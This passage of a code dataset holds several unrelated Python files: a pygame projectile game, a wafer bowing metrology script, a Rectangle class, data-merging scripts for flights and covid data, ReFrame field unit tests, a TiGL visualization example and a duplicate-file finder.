screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3000)\n fill()\n text_launcher = font.render(\"Press Enter At Launcher\", 40, (200,0,0))\n j = 0\n if j == 0:\n if player_x < screen_width / 100 * 25 and player_x > screen_width / 100:\n border = pygame.Rect(screen_width / 100 * 15, screen_height / 
100 * 66, 215, 26)\n pygame.draw.rect(screen, (0,0,0), border)\n text_enter = font.render(\"[Press Enter Here]\", 30, (255,255,255))\n screen.blit(text_enter, (screen_width / 100 * 15, screen_height / 100 * 66))\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n intro = False\n playing = True\n \n pygame.display.update()\n\ndef fill():\n global player_x\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n screen.blit(player_standing, (player_x, player_y))\n\n\n\n\n# General Set up\npygame.init()\nclock = pygame.time.Clock()\n\n#Setting up main window\n\nscreen_width = 800\nscreen_height = 600\nscreen = pygame.display.set_mode((screen_width,screen_height))\npygame.display.set_caption('projectile')\ni = 35\nj = 1\n\n#Graphics\ntarget = pygame.image.load('Target(1).png')\ntarget_rect = pygame.Rect(screen_width * i/48, screen_height * 70/72, target.get_width() - 2, 1)\n\nwall = pygame.Rect(screen_width / 120 * 60, screen_height * 66/100, screen_width / 120 * 5, screen_height * 34/100)\nball = pygame.Rect(screen_width / 120 * 30.4,screen_height / 80 * 64,15 ,15)\nline = pygame.Rect(screen_width / 120 * 28,screen_height / 80 * 65,50, 3)\n\ngravity = 9.8\n\nball_speed_x = 0\nball_speed_y = 0\nball_angle_increment = 0\nball_angle = 0\nball_velocity_increment = 0\nball_velocity = 7\ngravity = 9.8\nlives = 3\n\n\nlauncher = pygame.image.load('Projectile-Launcher.png')\nbackground = pygame.image.load('ChallengeRoom1.jpg')\nbackground_game = pygame.image.load('ChallengeRoom1(game scene).jpg')\ndoor_frame = pygame.image.load('DoorFrame.png')\nastronaut = pygame.image.load('astronaut instructor.png')\n\nspeech_1 = 
pygame.image.load(\"IntroText(1).png\")\nspeech_2 = pygame.image.load(\"IntroText(2).png\")\nspeech_3 = pygame.image.load(\"IntroText(3).png\")\nspeech_4 = pygame.image.load(\"IntroText(4).png\")\nspeech_5 = pygame.image.load(\"IntroText(5).png\")\nspeech_6 = pygame.image.load(\"IntroText(6).png\")\n\nsound1 = pygame.mixer.Sound('Part-1.wav')\nsound2 = pygame.mixer.Sound('Part-2.wav')\nsound3 = pygame.mixer.Sound('Part-3.wav')\nsound4 = pygame.mixer.Sound('Part-4_1.wav')\nsound5 = pygame.mixer.Sound('Part-5_1.wav')\n\n\nplayer_walking = [pygame.image.load('charv2(1).png'), pygame.image.load('charv2(2).png'), pygame.image.load('charv2(3).png'), pygame.image.load('charv2(4).png')]\nplayer_standing = pygame.image.load('charv2(5).png')\nplayer_width = 110\nplayer_height = 160\nplayer_vel = 5\nwalkcount = 0\nplayer_x = 0\nplayer_y = screen_height / 60 *43\nwalking = False\n\nbg_color = pygame.Color('grey12')\nlight_grey = (200,200,200)\n\nfont = pygame.font.SysFont(\"comicsans\", 30, True)\ntext_launcher = font.render(\"\", 40, (200,0,0))\n\n#Stages\nintro = True\nplaying = False\n\n\nwhile True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n \n while intro:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n \n \n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player_x -= 1.5\n walking = True\n if event.key == pygame.K_RIGHT:\n player_x += 1.5\n walking = True\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n walking = False\n if event.key == pygame.K_RIGHT:\n walking = False\n if event.key == pygame.K_RETURN:\n if player_x < screen_width / 100 * 25 and player_x > screen_width / 100 * 18:\n intro = False\n playing = True\n break\n\n \n player_animation()\n clock.tick(60)\n\n\n# Key Actions\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_DOWN:\n ball_angle_increment += 0.02 \n if event.key == pygame.K_UP:\n 
ball_angle_increment -= 0.02\n if event.key == pygame.K_LEFT:\n ball_velocity_increment -= 0.01\n if event.key == pygame.K_RIGHT:\n ball_velocity_increment += 0.01\n if event.key == pygame.K_RETURN:\n if ball_speed_x == 0 or ball_speed_y == 0:\n ball_speed_x = ball_velocity * math.cos(ball_angle * math.pi/180)\n ball_speed_y = ball_velocity * math.sin(ball_angle * math.pi/180)\n \n if event.type == pygame.KEYUP:\n if event.key == pygame.K_DOWN:\n ball_angle_increment = 0\n if event.key == pygame.K_UP:\n ball_angle_increment = 0\n if event.key == pygame.K_LEFT:\n ball_velocity_increment = 0\n if event.key == pygame.K_RIGHT:\n ball_velocity_increment = 0\n ball_animation()\n update()\n ball_speed_y += gravity/60 \n\n\n #Launcher Animation\n #launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n #screen.blit(launcher_copy, (screen_width / 120 * 27 - int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n \n \n\n \n ball_animation()\n update()\n #ball_velocity += ball_velocity_increment\n ball_speed_y += gravity/60 \n \n \n #Visuals\n \n #screen.fill(bg_color)\n #screen.blit(background, (0,0))\n #screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n #target_rect = pygame.Rect(screen_width * i/48, screen_height * 69/72, target.get_width(), 2)\n #pygame.draw.ellipse(screen, (0,200,200), ball)\n #pygame.draw.rect(screen, (0,0,0), line)\n #text = font.render(\"Angle \" + str(-1 * ball_angle), 30, (200,0,0))\n #text1 = font.render(\"Velocity \" + str(ball_velocity), 30, (200,0,0))\n #textlives = font.render(\"Lives Left: \" + str(lives), 30, (200,0,0))\n #screen.blit(textlives, (screen_width * 6/8, screen_height * 1/12))\n #screen.blit(text1, (screen_width/6, screen_height/8))\n #screen.blit(text, (screen_width/6, screen_height/12))\n #Launcher Animation\n #launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n #screen.blit(launcher_copy, (screen_width / 120 * 27 - 
int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n \n\n pygame.display.flip()\n clock.tick(30)\n\n","sub_path":"CernProjectile.py","file_name":"CernProjectile.py","file_ext":"py","file_size_in_byte":12657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34979633","text":"import sys\nfrom datetime import datetime\nimport pandas as pd\nimport numpy as np\nimport scipy as sp\n\n#call this with the input data file as a command line arguement\n\ndef getData():\n\n\tfilename = sys.argv[1]\n\tif filename.find('.ASC') < 0: sys.exit(\"File \"+filename+\" does not exist.\")\n\tdf = pd.read_csv(filename,encoding = \"utf-8\",sep='\\t')\n\treturn df\n\ndef cleanData(df):\n\tdf = df[df['Z'].notna()]\n\tdf = df[df['Z']!='Bad']\n\treturn df\n\ndef make13x13(data):\n\t#trim off edges of sensor (might need to increase the trim a bit for different sensor types)\n\t#find max X and Y\n\tmaxX = data['X'].max()\n\tmaxY = data['Y'].max()\n\tX_low = 0.1*maxX\n\tX_high = 0.9*maxX\n\tY_low = 0.1*maxY\n\tY_high = 0.9*maxY\n\n\tgrid13x13_xy = []\n\t#based on low and high X/Y, find 13x13 x,y coordinates for grid\n\tfor i in range(1,14):\n\t\tX_range = X_high-X_low\n\t\txpoint = round((i/21)*X_range,3)\n\t\tfor i in range(1,14):\n\t\t\tY_range = Y_high-Y_low\n\t\t\typoint = round((i/13)*Y_range,3)\n\t\t\tgrid13x13_xy.append([xpoint,ypoint])\n\n\tgrid13x13Z = []\n\t#find the nearest x,y the profilometer recorded to the x,y coordinates found above\n\ttry:\n\t\tfor coordinate in grid13x13_xy:\n\t\t\tmin_index = data['X'].sub(coordinate[0]).abs().idxmin()\n\t\t\tmax_index = data['X'].sub(coordinate[0]).abs().idxmax()\n\t\t\tdata_tmp = data[min_index:max_index]\n\t\t\ty_index = data_tmp['Y'].sub(coordinate[1]).abs().idxmin()\n\t\t\tgrid13x13Z.append([data['X'][min_index],data['Y'][y_index],data['Z'][y_index]])\n\texcept ValueError:\n\t\tpass\n\n\treturn grid13x13Z\n\ndef removeTilt(df):\n\t#df = 
pd.DataFrame(grid,columns = ['X','Y','Z'])\n\t#df['Z'] = round(df['Z'].astype(np.float)/1000,3)\n\n\t#fit to a plane\n\tY = df['Z']\n\tX = df[['X','Y']]\n\tX = X.to_numpy()\n\tX = X.astype(np.float)\n\tY = Y.astype(np.float)\n\ta = np.linalg.solve(np.dot(X.T,X),np.dot(X.T,Y))\n\tpredictedY = np.dot(X,a)\n\tpredictedY = predictedY\n\tZprime = predictedY.tolist()\n\tdf['Znew'] = Zprime\n\tdf[\"Z'\"] = (df['Znew'] - df['Z'])\n\tdf.drop(columns=['Znew'])\n\n\treturn df\n\ndef calculateBow(grid,outfile):\n\tdf = pd.DataFrame(grid,columns = ['X','Y','Z'])\n\tdf['Z'] = round(df['Z'].astype(np.float)/1000,3) #Z is in nm instead of um unlike X, Y\n\t#df['X'] = round(df['X'].astype(np.float),3)\n\t#df['Y'] = round(df['Y'].astype(np.float),3)\n\tmaxZ = df['Z'].astype(np.float).max()\n\tminZ = df['Z'].astype(np.float).min()\n\tbow = maxZ - minZ\n\n\tif len(sys.argv) >= 3: #if the data does not already have the tilt removed,\n\t\tdf = removeTilt(df)\n\t\tdf.drop(['Znew'], axis=1)\n\t\tdf[\"Z'\"] = round(df[\"Z'\"],3)\n\t\tmaxZdiff = df[\"Z'\"].max()\n\t\tminZdiff = df[\"Z'\"].min()\n\t\tbow = maxZdiff - minZdiff\n\telse:\n\t\tdf[\"Z'\"] = df['Z']\n\tdf['X'] = round(df['X'],3)\n\tdf['Y'] = round(df['Y'],3)\n\tcols = [\"X\",\"Y\",\"Z\",\"Z'\"]\n\tdf.to_csv(outfile,columns=cols,mode='a',index=False)\n\t#return bow,df\n\tif bow < 150:\n\t\tprint('Acceptable bowing of ',bow)\n\telse: print('Bowing too large: ',bow)\n\ndef header():\n\t#ask header questions\n\tsensors = {'R0',\"R1\",\"R2\",\"R3\",\"R4\",\"R5\"}\n\tsensor_type = input('Enter sensor type: ')\n\tif sensor_type not in sensors: sys.exit('Not a sensor type.')\n\n\tbatch = input('Enter batch number: ')\n\twafer = input('Enter Wafer #: ')\n\ttoday = datetime.today().strftime('%d %B %Y')\n\ttime = datetime.now().strftime('%H:%M:%S')\n\n\tuser = input('Enter user: ')\n\tusers = ['alyssa','graham','luise','scott','xavier']\n\tif (user.lower() not in users): sys.exit('Unknown user')\n\n\ttemp = input('Enter temperature: ')\n\tif 
(float(temp) < 16.5) or (float(temp) > 21.5): sys.exit('Unallowable temperature.')\n\n\thumidity = input('Enter humidity: ')\n\tif float(humidity) > 20.: sys.exit('Unallowable humidity.')\n\n #write heading using user inputs\n\n\toutfile = batch+'_'+wafer+\"_metrology.dat\"\n\tout = open(outfile,'w')\n\n\tout.write('Type: '+sensor_type+'\\n')\n\tout.write('Batch: '+batch+'\\n')\n\tout.write('Wafer: '+wafer+'\\n')\n\tout.write('Date: '+today+'\\n')\n\tout.write('Time: '+time+'\\n')\n\tout.write('Institute: SFU'+'\\n')\n\tout.write('User: '+user+'\\n')\n\tout.write('TestType: SENSOR_METROLOGY'+'\\n')\n\tout.write('Temperature: '+temp+'\\n')\n\tout.write('Humidity: '+humidity+'\\n')\n\tout.write('\\n')\n\n\tout.close()\n\n\treturn outfile\n\ndef main():\n\n\toutfile = header()\n\tdata = getData()\n\tdata = cleanData(data)\n\tgrid = make13x13(data)\n\tcalculateBow(grid,outfile)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bowing.py","file_name":"bowing.py","file_ext":"py","file_size_in_byte":4208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"27409597","text":"#!/usr/bin/python3\n\"\"\" rectangle class \"\"\"\nfrom models.base import Base\n\n\nclass Rectangle(Base):\n \"\"\" Rectangle class \"\"\"\n def __init__(self, width, height, x=0, y=0, id=None):\n \"\"\" rectangle constructor \"\"\"\n super().__init__(id)\n self.width = width\n self.height = height\n self.x = x\n self.y = y\n\n @property\n def width(self):\n \"\"\" width getter \"\"\"\n return self.__width\n\n @width.setter\n def width(self, value):\n \"\"\" width setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"width must be an integer\")\n if value <= 0:\n raise ValueError(\"width must be > 0\")\n self.__width = value\n\n @property\n def height(self):\n \"\"\" height getter \"\"\"\n return self.__height\n\n @height.setter\n def height(self, value):\n \"\"\" height setter \"\"\"\n if type(value) is not int:\n raise 
TypeError(\"height must be an integer\")\n if value <= 0:\n raise ValueError(\"height must be > 0\")\n self.__height = value\n\n @property\n def x(self):\n \"\"\" x getter \"\"\"\n return self.__x\n\n @x.setter\n def x(self, value):\n \"\"\" x setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"x must be an integer\")\n if value < 0:\n raise ValueError(\"x must be >= 0\")\n self.__x = value\n\n @property\n def y(self):\n \"\"\" y getter \"\"\"\n return self.__y\n\n @y.setter\n def y(self, value):\n \"\"\" y setter \"\"\"\n if type(value) is not int:\n raise TypeError(\"y must be an integer\")\n if value < 0:\n raise ValueError(\"y must be >= 0\")\n self.__y = value\n\n def area(self):\n \"\"\" rectangle area \"\"\"\n return self.__width * self.__height\n\n def display(self):\n \"\"\" print # rectangle \"\"\"\n print(\"\\n\" * self.__y, end=\"\")\n for i in range(self.__height):\n print(\"{}{}\".format(\" \" * self.__x, \"#\" * self.__width))\n\n def __str__(self):\n \"\"\" str func \"\"\"\n return \"[{}] ({}) {}/{} - {}/{}\".format(\n type(self).__name__, self.id, self.__x,\n self.__y, self.__width, self.__height)\n\n def update(self, *args, **kwargs):\n \"\"\" args and kwargs \"\"\"\n attrib = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n if len(args) > 0:\n for i, arg in enumerate(args):\n setattr(self, attrib[i], arg)\n else:\n for k, v in kwargs.items():\n setattr(self, k, v)\n\n def to_dictionary(self):\n \"\"\" rectangle to dictionary \"\"\"\n dic = {}\n attrib = [\"id\", \"width\", \"height\", \"x\", \"y\"]\n for i in attrib:\n dic[i] = getattr(self, i)\n return(dic)\n","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66655748","text":"import sys\nfrom handler import *\nfrom core.common.tasks.gcloud_operation import dates_range\nimport datetime\n\n# Default 
date\nYESTERDAY = (datetime.date.today() - datetime.timedelta(1)).strftime('%Y%m%d')\n# Use dates_range to generate range of dates\n# If date arguments are passed when calling script\ntry:\n\tDATES = dates_range(sys.argv[1], sys.argv[2])\nexcept IndexError:\n\tDATES = [YESTERDAY]\n\nQUERY = open('user_interest.sql', 'r').read()\nDESTINATION_TABLE_ID = 'catalog_analysis_user_interest_analysis'\n\nreport = ReportHandler(QUERY, DESTINATION_TABLE_ID, DATES)\nreport.start()\nreport.join()\n","sub_path":"user_interest/user_interest.py","file_name":"user_interest.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"137100234","text":"#%%\nimport pandas as pd\nimport numpy as np\nimport re\nfrom azureml.core import Workspace, Dataset, workspace\n\nworkspace = Workspace.from_config()\n\n# %% Get datasets from ML workspace\nweather = Dataset.get_by_name(workspace, name='all_weather')\ncovid = Dataset.get_by_name(workspace, name='us_state_covid')\nflights = Dataset.get_by_name(workspace, name='all_flights')\n\n# %% Convert to pandas dataframes\nweather = weather.to_pandas_dataframe().iloc[:, 1:]\ncovid = covid.to_pandas_dataframe()\nflights = flights.to_pandas_dataframe().iloc[:, 1:]\n\n# %% Percent null function\ndef percent_null(df):\n\treturn df.apply(lambda x: sum(x.isnull())/x.fillna(0).count())\n\ndef strip_str_cols(df):\n\tdf_str_cols = df.dtypes == object\n\tdf.loc[:, df_str_cols] = df.loc[:, df_str_cols].apply(lambda x: x.str.strip())\n\n# %% Weather data\nweather.info()\n# Calculate percent missing/null for each column and drop unwanted columns\npercent_null(weather)\n\n# weather.drop(columns=['Column2'], inplace=True)\nweather.rename(columns=lambda x: x.lower(), inplace=True)\n\n# %% Covid data\ncovid['date'] = pd.to_datetime(covid['date'], format=r'%Y%m%d')\n\ncovid.info()\n# Calculate percent missing/null for each 
column\npercent_null(covid)\n\nstrip_str_cols(covid)\n\n# %% Flights data\nflights.info()\npercent_null(flights)\n\n# Clean flight column names\nflights.rename(columns={'Date_(MM/DD/YYYY)': 'date'}, inplace=True)\nflights.rename(columns=lambda x: re.sub(r'^(.+)_\\((.+)\\)$', r'\\1_\\2', x.lower()), inplace=True)\nflights.rename(columns=lambda x: x.strip().replace(r' ', '_'), inplace=True)\nflights.rename(columns={\n\t'city': 'destination_city', \n\t'state': 'destination_state', \n\t'airport_code': 'destination_airprt_code',\n\t'airport_name': 'destination_airprt_name'\n}, inplace=True)\n\nflights = flights.drop(\n\tcolumns=[\n\t\t'carrier_code', 'flight_number', 'departure_airprt_code',\n\t\t'scheduled_elapsed_time_minutes', 'actual_elapsed_time_minutes',\n\t\t'taxi-out_time_minutes', \n\t\t'tail_number', 'destination_airport', 'scheduled_departure_time',\n\t\t'actual_departure_time', 'wheels-off_time', 'destination_airprt_code',\n\t\t'destination_city', 'destination_state', 'destination_airprt_name'\n\t]\n).iloc[:-1,]\n\nstrip_str_cols(flights)\n# flights['flight_number'] = flights['flight_number'].apply(lambda x: re.sub(r'\\.\\d+$', '', x))\n\n# %% Aggregate by date and departure airport\nflights_grp = flights.groupby(by=['date' , 'departure_state', 'departure_airport'])\n\nflights_agg = flights_grp.agg(\n\ttotal_daily_flights=('year', 'count'),\n\tavg_delay_carrier=('delay_carrier_minutes', np.mean),\n\tavg_delay_weather=('delay_weather_minutes', np.mean),\n\tavg_national_avi_system=('delay_national_aviation_system_minutes', np.mean),\n\tavg_delay_security=('delay_security_minutes', np.mean),\n\tavg_delay_late_aircraft=('delay_late_aircraft_arrival_minutes', np.mean),\n\tdeparture_airport_name=('departure_airport_name', 'first')\n).reset_index()\n\n# %% Join data with validation\nfull_df = pd.merge(\n\tflights_agg, covid, how='left', \n\tleft_on=['date', 'departure_state'], right_on=['date', 'state'], 
\n\tvalidate='many_to_one'\n).drop(columns=['state'])\n\nfull_df = pd.merge(\n\tfull_df, weather, how='left', \n\tleft_on=['date', 'departure_airport'], right_on=['date', 'airport_code'], \n\tvalidate='many_to_one'\n).drop(columns=['airport_code'])\n\n# Write to local storage\nfull_df.to_csv('../../data/final_data/full_df.csv')\n\n# upload the local file from src_dir to the target_path in default datastore\ndatastore = workspace.get_default_datastore()\ndatastore.upload(src_dir='../../data/final_data/', target_path='')\n\n","sub_path":"lib/data/full_data_merged.py","file_name":"full_data_merged.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"73351929","text":"import os\nimport unittest\n\nimport reframe.core.fields as fields\nfrom reframe.utility import ScopedDict\n\n\nclass TestFields(unittest.TestCase):\n def test_not_set_attribute(self):\n class FieldTester:\n var = fields.Field('var')\n\n c = FieldTester()\n self.assertRaises(AttributeError, exec, \"a = c.var\",\n globals(), locals())\n self.assertRaises(AttributeError, getattr, c, 'var')\n\n def test_copy_on_write_field(self):\n class FieldTester:\n cow = fields.CopyOnWriteField('cow')\n\n tester = FieldTester()\n var = [1, [2, 4], 3]\n\n # Set copy-on-write field\n tester.cow = var\n\n # Verify that the lists are different\n self.assertIsNot(var, tester.cow)\n\n # Make sure we have a deep copy\n var[1].append(5)\n self.assertEqual(tester.cow, [1, [2, 4], 3])\n self.assertIsInstance(FieldTester.cow, fields.CopyOnWriteField)\n\n def test_constant_field(self):\n class FieldTester:\n ro = fields.ConstantField('foo')\n\n tester = FieldTester()\n self.assertEqual(FieldTester.ro, 'foo')\n self.assertEqual(tester.ro, 'foo')\n self.assertRaises(ValueError, exec, \"tester.ro = 'bar'\",\n globals(), locals())\n\n def test_typed_field(self):\n class ClassA:\n def __init__(self, val):\n self.value = val\n\n class 
ClassB(ClassA):\n def __init__(self):\n super().__init__(10)\n\n class FieldTester:\n field = fields.TypedField('field', ClassA)\n field_any = fields.TypedField('field_any', ClassA, str, type(None))\n\n def __init__(self, value):\n self.field = value\n\n tester = FieldTester(ClassA(3))\n self.assertIsInstance(FieldTester.field, fields.TypedField)\n self.assertEqual(3, tester.field.value)\n self.assertRaises(TypeError, FieldTester, 3)\n\n tester.field = ClassB()\n self.assertEqual(10, tester.field.value)\n with self.assertRaises(TypeError):\n tester.field = None\n\n tester.field_any = None\n tester.field_any = 'foo'\n tester.field_any = ClassA(5)\n with self.assertRaises(TypeError):\n tester.field_any = 3\n\n def test_timer_field(self):\n class FieldTester:\n field = fields.TimerField('field')\n field_maybe_none = fields.TimerField(\n 'field_maybe_none', type(None))\n\n tester = FieldTester()\n tester.field = (65, 22, 47)\n tester.field_maybe_none = None\n\n self.assertIsInstance(FieldTester.field, fields.TimerField)\n self.assertEqual((65, 22, 47), tester.field)\n self.assertRaises(TypeError, exec, 'tester.field = (2,)',\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = (2, 2)',\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = (2, 2, 3.4)',\n globals(), locals())\n self.assertRaises(TypeError, exec, \"tester.field = ('foo', 2, 3)\",\n globals(), locals())\n self.assertRaises(TypeError, exec, 'tester.field = 3',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (-2, 3, 5)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, -3, 4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 3, -4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 65, 4)',\n globals(), locals())\n self.assertRaises(ValueError, exec, 'tester.field = (100, 3, 65)',\n globals(), locals())\n\n def 
test_proxy_field(self):\n class Target:\n def __init__(self):\n self.a = 1\n self.b = 2\n\n t = Target()\n\n class Proxy:\n a = fields.ForwardField(t, 'a')\n b = fields.ForwardField(t, 'b')\n\n proxy = Proxy()\n self.assertIsInstance(Proxy.a, fields.ForwardField)\n self.assertEqual(1, proxy.a)\n self.assertEqual(2, proxy.b)\n\n proxy.a = 3\n proxy.b = 4\n self.assertEqual(3, t.a)\n self.assertEqual(4, t.b)\n\n def test_deprecated_field(self):\n from reframe.core.exceptions import ReframeDeprecationWarning\n\n class FieldTester:\n value = fields.DeprecatedField(fields.TypedField('value', int),\n 'value field is deprecated')\n _value = fields.TypedField('value', int)\n ro = fields.DeprecatedField(fields.TypedField('ro', int),\n 'value field is deprecated',\n fields.DeprecatedField.OP_SET)\n _ro = fields.TypedField('ro', int)\n wo = fields.DeprecatedField(fields.TypedField('wo', int),\n 'value field is deprecated',\n fields.DeprecatedField.OP_GET)\n\n def __init__(self):\n self._value = 1\n self._ro = 2\n self.wo = 3\n\n tester = FieldTester()\n\n # Test set operation\n with self.assertWarns(ReframeDeprecationWarning):\n tester.value = 2\n\n with self.assertWarns(ReframeDeprecationWarning):\n tester.ro = 1\n\n try:\n tester.wo = 20\n except ReframeDeprecationWarning:\n self.fail('deprecation warning not expected here')\n\n # Test get operation\n try:\n a = tester.ro\n except ReframeDeprecationWarning:\n self.fail('deprecation warning not expected here')\n\n with self.assertWarns(ReframeDeprecationWarning):\n a = tester.value\n\n with self.assertWarns(ReframeDeprecationWarning):\n a = tester.wo\n\n def test_absolute_path_field(self):\n class FieldTester:\n value = fields.AbsolutePathField('value', type(None))\n\n def __init__(self, value):\n self.value = value\n\n tester = FieldTester('foo')\n self.assertEqual(os.path.abspath('foo'), tester.value)\n\n # Test set with an absolute path already\n tester.value = os.path.abspath('foo')\n 
self.assertEqual(os.path.abspath('foo'), tester.value)\n\n # This should not raise\n tester.value = None\n with self.assertRaises(TypeError):\n tester.value = 1\n\n def test_scoped_dict_field(self):\n class FieldTester:\n field = fields.ScopedDictField('field', int)\n field_maybe_none = fields.ScopedDictField(\n 'field_maybe_none', int, type(None))\n\n tester = FieldTester()\n\n # Test valid assignments\n tester.field = {\n 'a': {'k1': 1, 'k2': 2},\n 'a:b': {'k1': 3, 'k3': 4},\n 'a:b:c': {'k2': 5, 'k3': 6},\n '*': {'k1': 7, 'k3': 9, 'k4': 10}\n }\n tester.field_maybe_none = None\n\n # Check that we have indeed a ScopedDict here\n self.assertIsInstance(FieldTester.field, fields.ScopedDictField)\n self.assertIsInstance(tester.field, ScopedDict)\n self.assertEqual(10, tester.field['a:k4'])\n\n # Test invalid assignments\n self.assertRaises(TypeError, exec,\n 'tester.field = {1: \"a\", 2: \"b\" }',\n globals(), locals())\n self.assertRaises(TypeError, exec,\n \"tester.field = [('a', 1), ('b', 2)]\",\n globals(), locals())\n self.assertRaises(TypeError, exec,\n '''tester.field = {'a': {1: 'k1'},\n 'b': {2: 'k2'}}''',\n globals(), locals())\n\n # Test assigning a ScopedDict already\n tester.field = ScopedDict({})\n","sub_path":"unittests/test_fields.py","file_name":"test_fields.py","file_ext":"py","file_size_in_byte":8139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231790466","text":"from __future__ import print_function\n\nfrom tixi3 import tixi3wrapper\nfrom tigl3 import tigl3wrapper\nimport tigl3.configuration, tigl3.geometry, tigl3.boolean_ops, tigl3.exports\nimport os\n\ndef display_configuration(tigl_handle):\n \"\"\"\n This is an example how to use the internal tigl/pyocc API\n to display all wing and fuselage segments\n \"\"\"\n\n from OCC.Display.SimpleGui import init_display\n\n # get the configuration manager\n mgr = tigl3.configuration.CCPACSConfigurationManager_get_instance()\n\n # get the CPACS 
configuration, defined by the tigl handle\n # we need to access the underlying tigl handle (that is used in the C/C++ API)\n config = mgr.get_configuration(tigl_handle._handle.value)\n\n display, start_display, add_menu, add_function_to_menu = init_display()\n\n for ifuse in range(1, config.get_fuselage_count() + 1):\n fuselage = config.get_fuselage(ifuse)\n for isegment in range(1, fuselage.get_segment_count() + 1):\n segment = fuselage.get_segment(isegment)\n display.DisplayShape(segment.get_loft().shape(), update=True)\n\n mirrored_shape = segment.get_mirrored_loft()\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n for iwing in range(1, config.get_wing_count() + 1):\n wing = config.get_wing(iwing)\n\n for isegment in range(1, wing.get_segment_count() + 1):\n segment = wing.get_segment(isegment)\n\n display.DisplayShape(segment.get_loft().shape(), update=True)\n\n mirrored_shape = segment.get_mirrored_loft()\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n for iobj in range(1, config.get_external_object_count()+1):\n obj = config.get_external_object(iobj)\n shape = obj.get_loft()\n\n if shape is not None:\n display.DisplayShape(shape.shape(), update=True)\n\n mirrored_shape = obj.get_mirrored_loft()\n\n if mirrored_shape is not None:\n display.DisplayShape(mirrored_shape.shape(), update=True)\n\n display.FitAll()\n\n start_display()\n\n\nif __name__ == '__main__':\n tixi_h = tixi3wrapper.Tixi3()\n tigl_h = tigl3wrapper.Tigl3()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n tixi_h.open(dir_path + \"/../../tests/unittests/TestData/D150_v30.xml\")\n tigl_h.open(tixi_h, \"\")\n\n display_configuration(tigl_h)\n","sub_path":"examples/python_internal/example_visualization.py","file_name":"example_visualization.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"594793074","text":"# Based on Andre Torres' tutorial here:\n# https://www.pythoncentral.io/finding-duplicate-files-with-python/\n\nimport os\nimport sys\nimport hashlib\n\ndef findDup(parentFolder):\n\t# Dups in format {hash:[names]}\n\tdups = {}\n\tfor dirName, subdirs, fileList in os.walk(parentFolder):\n\t\tprint('Scanning %s...' % dirName)\n\t\tcounter = 0\n\t\tfor filename in fileList:\n\t\t\tcounter += 1\n\t\t\tsys.stdout.write('\\rfiles scanned: {}'.format(counter))\n\t\t\tsys.stdout.flush()\n\t\t\t# Get the path to the file\n\t\t\tpath = os.path.join(dirName, filename)\n\t\t\t# Calculate hash\n\t\t\tfile_hash = hashfile(path)\n\t\t\t# Add or append the file path\n\t\t\tif file_hash in dups:\n\t\t\t\tdups[file_hash].append(path)\n\t\t\telse:\n\t\t\t\tdups[file_hash] = [path]\n\n\treturn dups\n\n# Join two dictionaries\ndef joinDicts(dict1, dict2):\n\tfor key in dict2.keys():\n\t\tif key in dict1:\n\t\t\tdict1[key] = dict1[key] + dict2[key]\n\t\telse:\n\t\t\tdict1[key] = dict2[key]\n\ndef hashfile(path, blocksize = 65536):\n\tafile = open(path, 'rb')\n\thasher = hashlib.md5()\n\tbuf = afile.read(blocksize)\n\twhile len(buf) > 0:\n\t\t\thasher.update(buf)\n\t\t\tbuf = afile.read(blocksize)\n\tafile.close()\n\treturn hasher.hexdigest()\n\ndef printResults(dict1):\n\tresults = list(filter(lambda x: len(x) > 1, dict1.values()))\n\tif len(results) > 0:\n\t\tprint('\\n\\n{} duplicates found:'.format(len(results)))\n\t\tprint('The following files are identical. 
